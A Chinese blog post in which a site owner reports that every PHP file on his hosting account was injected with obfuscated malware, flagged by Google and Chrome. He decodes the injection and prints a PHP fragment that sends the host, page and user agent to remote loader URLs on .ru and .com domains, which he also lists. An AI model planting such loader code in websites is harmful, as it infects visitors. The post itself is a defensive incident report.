博客被注入恶意代码

这两天准备更新下本博客的评论,加上诸如评论啦、多说等插件,发现某些php文件貌似不太对劲。今天又收到了google的名为“Malware notification regarding tanglei.name”的邮件,再进博客后台,发现博客所有的php文件被感染,诸如下图一些加密代码。用chrome访问博客时也被拦截,提示“警告:此页面包含危险内容!www.tanglei.name 包含恶意软件。如果您访问此网站,您的计算机可能会中毒。……”


网页包含恶意软件

植入木马

 

 

再SSH进入主机,发现该主机下其他域名的所有的php文件都植入了这些代码。如图所示,我的i3zhai.com也中招了.


网页包含恶意软件

植入恶意代码

 

 

base64解码以上植入的恶意代码,发现以上恶意代码跟目标主机相关联的关键的几行代码:

$_SERVER['s_p1']=$mz;  $_SERVER['s_b1']=$bot;  $_SERVER['s_t1']=1200;  $_SERVER['s_d1']=base64_decode('aHR0cDovL2VuczEyMnp6emRkYXp6LmNvbS8=');  $d='?d='.urlencode($_SERVER["HTTP_HOST"])."&p=".urlencode($_SERVER["PHP_SELF"])."&a=".urlencode($_SERVER["HTTP_USER_AGENT"]); 
$_SERVER['s_a1']=base64_decode('aHR0cDovL3BtZ2N6a2luZml1bS5ydS9nX2xvYWQucGhw').$d;  $_SERVER['s_a2']=base64_decode('aHR0cDovL2luZmlwbWcucnUvZ19sb2FkLnBocA==').$d;  
$_SERVER['s_script']="pmg.php?d=x";

关键url还得base64解码,得到的url如下:

http://pmgczkinfium.ru/g_load.php
http://infipmg.ru/g_load.php
http://ens122zzzddazz.com/

看来就是跟这些相关了。查了这几个url,发现也有其他站点中招了。

目前我能想到的解决方案就是写个脚本,在后台跑一下,把所有php中这些代码都删除掉。不过这个有风险啊,一是不知道后台允许我执行这样的脚本么,而是操作这些代码要是有个什么差错的话就惨了。目前联系了主机提供商,看看他们有什么解决方案。

暂且就不管了吧。如果你现在能看到这篇文章就是忽略浏览器的拦截了。呵呵。待解决……

公司简介

 

自1996年以来,公司一直专注于域名注册、虚拟主机、服务器托管、网站建设、电子商务等互联网服务,不断践行"提供企业级解决方案,奉献个性化服务支持"的理念。作为戴尔"授权解决方案提供商",同时提供与公司服务相关联的硬件产品解决方案。
备案号: 豫ICP备05004936号-1

联系方式

地址:河南省郑州市经五路2号

电话:0371-63520088

QQ:76257322

网站:800188.com

电邮:该邮件地址已受到反垃圾邮件插件保护。要显示它需要在浏览器中启用 JavaScript。